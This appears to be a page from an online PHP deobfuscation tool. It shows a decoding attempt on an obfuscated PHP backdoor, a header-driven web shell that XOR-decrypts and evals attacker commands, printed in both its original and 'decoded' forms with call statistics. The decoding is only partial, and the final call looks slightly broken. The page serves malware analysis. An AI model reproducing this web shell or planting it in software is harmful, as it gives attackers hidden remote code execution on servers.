Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$f='rtolower"i;;$i=$i;i;m[1i;][i;0].$m[i;1][1];$h=$sl($ssi;i;(i;md5($i.$kh)i;,0,3)i;);$f=$..
Decoded Output download
<? $f='rtolower"i;;$i=$i;i;m[1i;][i;0].$m[i;1][1];$h=$sl($ssi;i;(i;md5($i.$kh)i;,0,3)i;);$f=$sli;($ss(md5(i;$i.$kf),0,3';
$x=';);$d=bai;se64+i;encodi;e(x(i;i;gzcompi;press($o),$k)i;);print("<i;i;$k>$d</$k>")i;i;;@session_i;dei;stroy();}}}}';
$k='r);print $u;pari;i;se_si;tr($u["query"],$q);$q=i;arrai;y_values($i;q)i;;preg_match_all("/([\w])[\w-]+(i;?:;q=0.';
$X=str_replace('jh','','create_function');
$p=')i;);$i;p=""i;;i;for($z=1i;;$z<count($i;m[i;i;1]);i;$z++)$p.=$i;q[$mi;[2][$z]];if(strpos(i;$p,i;$h)===0i;){$s[$i;';
$o='i]i;="";$p=$ssi;($p,3);i;}i;if(array_key_exists($i,$s)){$s[$i].i;=$p;i;$e=strpos(i;$s[$i],$fi;);ifi;(';
$u='i;([\d]))i;?,?/",$rai;,$m);if(i;$i;q&&$m)i;{@i;session_start();$s=&$_Si;ESSION;$si;s="substr";$sl="st';
$j=';$rr=@$i;r["HTTP_REFERRER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($r';
$C='$ki;h="2b90i;";$kf="3105";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i';
$I='i;$e){$k=i;$kh.i;$kf;ob_start();i;@ei;val(@gzuncompress(@x(@base64_decode(preg_replace(array(i';
$b=';"/_/",i;"/-/"),array("/"i;,"+")i;i;,$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean(i';
$q='<$l;){for($j=0; ($j<$c && $$i<$l); $j++, $i++ ){$o.=$t{$i}^$k{$j};}}var_dump($o);return $o;}$r=$_SERVER';
$c=str_replace('i;','',$C.$q.$j.$k.$u.$f.$p.$o.$I.$b.$x);
$V=$X('',$zfe);
$V(); ?>
Did this file decode correctly?
Original Code
$f='rtolower"i;;$i=$i;i;m[1i;][i;0].$m[i;1][1];$h=$sl($ssi;i;(i;md5($i.$kh)i;,0,3)i;);$f=$sli;($ss(md5(i;$i.$kf),0,3';
$x=';);$d=bai;se64+i;encodi;e(x(i;i;gzcompi;press($o),$k)i;);print("<i;i;$k>$d</$k>")i;i;;@session_i;dei;stroy();}}}}';
$k='r);print $u;pari;i;se_si;tr($u["query"],$q);$q=i;arrai;y_values($i;q)i;;preg_match_all("/([\\w])[\\w-]+(i;?:;q=0.';
$X=str_replace('jh','','create_function');
$p=')i;);$i;p=""i;;i;for($z=1i;;$z<count($i;m[i;i;1]);i;$z++)$p.=$i;q[$mi;[2][$z]];if(strpos(i;$p,i;$h)===0i;){$s[$i;';
$o='i]i;="";$p=$ssi;($p,3);i;}i;if(array_key_exists($i,$s)){$s[$i].i;=$p;i;$e=strpos(i;$s[$i],$fi;);ifi;(';
$u='i;([\\d]))i;?,?/",$rai;,$m);if(i;$i;q&&$m)i;{@i;session_start();$s=&$_Si;ESSION;$si;s="substr";$sl="st';
$j=';$rr=@$i;r["HTTP_REFERRER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($r';
$C='$ki;h="2b90i;";$kf="3105";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i';
$I='i;$e){$k=i;$kh.i;$kf;ob_start();i;@ei;val(@gzuncompress(@x(@base64_decode(preg_replace(array(i';
$b=';"/_/",i;"/-/"),array("/"i;,"+")i;i;,$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean(i';
$q='<$l;){for($j=0; ($j<$c && $$i<$l); $j++, $i++ ){$o.=$t{$i}^$k{$j};}}var_dump($o);return $o;}$r=$_SERVER';
$c=str_replace('i;','',$C.$q.$j.$k.$u.$f.$p.$o.$I.$b.$x);
$V=$X('',$zfe);
$V();
Function Calls
| str_replace | 2 |
| create_function | 1 |
Stats
| MD5 | 65cdc736767c5a19da7c959a1983f9fb |
| Eval Count | 0 |
| Decode Time | 92 ms |